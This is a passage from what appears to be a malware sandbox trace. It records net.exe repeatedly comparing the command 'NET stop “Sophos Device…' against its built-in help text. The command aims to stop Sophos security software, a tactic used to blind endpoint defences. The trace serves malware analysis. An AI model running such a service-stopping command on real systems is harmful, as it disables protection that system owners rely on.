lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0x184 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET USE\r\n[devicename | ", _MaxCount=0x17) returned -2 [0121.655] LocalFree (hMem=0x519738) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0xc7 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET USER\r\n[username [pa", _MaxCount=0x17) returned -2 [0121.655] LocalFree (hMem=0x519738) returned 0x0 [0121.655] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0x47 [0121.655] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET VIEW\r\n[\\\\computerna", _MaxCount=0x17) returned -3 [0121.655] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0xc2 [0121.656] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NET\r\n [ ACCOUNTS | C", _MaxCount=0x17) returned 19 [0121.656] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0x319 [0121.656] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="SERVICES\r\nNET START can", _MaxCount=0x17) returned -5 [0121.656] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0x483 [0121.656] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="SYNTAX\r\nThe following c", _MaxCount=0x17) returned -5 [0121.656] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0xa86 [0121.656] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="NAMES\r\nThe following ty", _MaxCount=0x17) returned 4 [0121.656] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0x54 [0121.656] _wcsnicmp (_String1="NET stop “Sophos Device", _String2="\r\nFor more information ", _MaxCount=0x17) returned 97 [0121.656] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c霸Q\x0c") returned 0xad [0121.656] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET ACCOUNTS\r\n[/", _MaxCount=0x10) returned 18 [0121.656] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c霸Q\x0c") returned 0x2e [0121.656] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET COMPUTER\r\n\\\\", _MaxCount=0x10) returned 16 [0121.656] LocalFree (hMem=0x513e48) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c㹈Q\x0c") returned 0x7d [0121.656] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONFIG SERVE", _MaxCount=0x10) returned 16 [0121.656] LocalFree (hMem=0x519738) returned 0x0 [0121.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c霸Q\x0c") returned 0x26 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONFIG\r\n[SER", _MaxCount=0x10) returned 16 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONTINUE\r\nse", _MaxCount=0x10) returned 16 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x1b [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET FILE\r\n[id [/", _MaxCount=0x10) returned 13 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c㹈Q\x0c") returned 0xbe [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET GROUP\r\n[grou", _MaxCount=0x10) returned 12 [0121.657] LocalFree (hMem=0x519738) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c霸Q\x0c") returned 0x33 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET HELP\r\ncomman", _MaxCount=0x10) returned 11 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET HELPMSG\r\nmes", _MaxCount=0x10) returned 11 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c㹈Q\x0c") returned 0xc1 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET LOCALGROUP\r\n", _MaxCount=0x10) returned 7 [0121.657] LocalFree (hMem=0x519738) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c霸Q\x0c") returned 0x16 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET PAUSE\r\nservi", _MaxCount=0x10) returned 3 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x33 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET SESSION\r\n[\\\\", _MaxCount=0x10) returned 15 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="霸Q⡋盺\x0c㹈Q\x0c") returned 0x234 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET SHARE\r\nshare", _MaxCount=0x10) returned 12 [0121.657] LocalFree (hMem=0x519738) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c霸Q\x0c") returned 0x13 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START BROWSE", _MaxCount=0x10) returned 14 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.657] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START CLIPBO", _MaxCount=0x10) returned 14 [0121.657] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START EVENTL", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START MESSEN", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START NET LO", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x16 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START RPCLOC", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㱠Q⡋盺\x0c㹈Q\x0c") returned 0x11 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START RPCSS\r", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513c60) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㱠Q\x0c") returned 0x14 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START SCHEDU", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x12 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START SERVER", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0xf [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START UPS\r\n", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x17 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START WORKST", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x18 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START\r\n[serv", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x2a [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET STATISTICS\r\n", _MaxCount=0x10) returned 14 [0121.658] LocalFree (hMem=0x513e48) returned 0x0 [0121.658] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.658] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET STOP\r\nservic", _MaxCount=0x10) returned 19 [0121.659] LocalFree (hMem=0x513e48) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c㹈Q\x0c") returned 0x58 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET TIME\r\n\r\n[\\\\c", _MaxCount=0x10) returned -1 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0x184 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET USE\r\n[device", _MaxCount=0x10) returned -2 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0xc7 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET USER\r\n[usern", _MaxCount=0x10) returned -2 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0x47 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET VIEW\r\n[\\\\com", _MaxCount=0x10) returned -3 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0xc2 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET\r\n [ ACCOU", _MaxCount=0x10) returned 19 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0x319 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="SERVICES\r\nNET ST", _MaxCount=0x10) returned -5 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0x483 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="SYNTAX\r\nThe foll", _MaxCount=0x10) returned -5 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0xa86 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="NAMES\r\nThe follo", _MaxCount=0x10) returned 4 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0x54 [0121.659] _wcsnicmp (_String1="NET stop “Sophos", _String2="\r\nFor more infor", _MaxCount=0x10) returned 97 [0121.659] LocalFree (hMem=0x51b738) returned 0x0 [0121.659] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c뜸Q\x0c") returned 0xad [0121.659] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0121.660] LocalFree (hMem=0x51b738) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c뜸Q\x0c") returned 0x2e [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c㹈Q\x0c") returned 0x7d [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0121.660] LocalFree (hMem=0x51b738) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c뜸Q\x0c") returned 0x26 [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x1b [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c㹈Q\x0c") returned 0xbe [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0121.660] LocalFree (hMem=0x51b738) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c뜸Q\x0c") returned 0x33 [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c㹈Q\x0c") returned 0xc1 [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0121.660] LocalFree (hMem=0x51b738) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c뜸Q\x0c") returned 0x16 [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x33 [0121.660] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0121.660] LocalFree (hMem=0x513e48) returned 0x0 [0121.660] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="뜸Q⡋盺\x0c㹈Q\x0c") returned 0x234 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0121.661] LocalFree (hMem=0x51b738) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c뜸Q\x0c") returned 0x13 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.661] LocalFree (hMem=0x513e48) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.661] LocalFree (hMem=0x513e48) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.661] LocalFree (hMem=0x513e48) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.661] LocalFree (hMem=0x513e48) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.661] LocalFree (hMem=0x513e48) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x16 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.661] LocalFree (hMem=0x513e48) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㱠Q⡋盺\x0c㹈Q\x0c") returned 0x11 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.661] LocalFree (hMem=0x513c60) returned 0x0 [0121.661] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㱠Q\x0c") returned 0x14 [0121.661] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.662] LocalFree (hMem=0x513e48) returned 0x0 [0121.662] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x12 [0121.662] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.662] LocalFree (hMem=0x513e48) returned 0x0 [0121.662] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0xf [0121.662] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.662] LocalFree 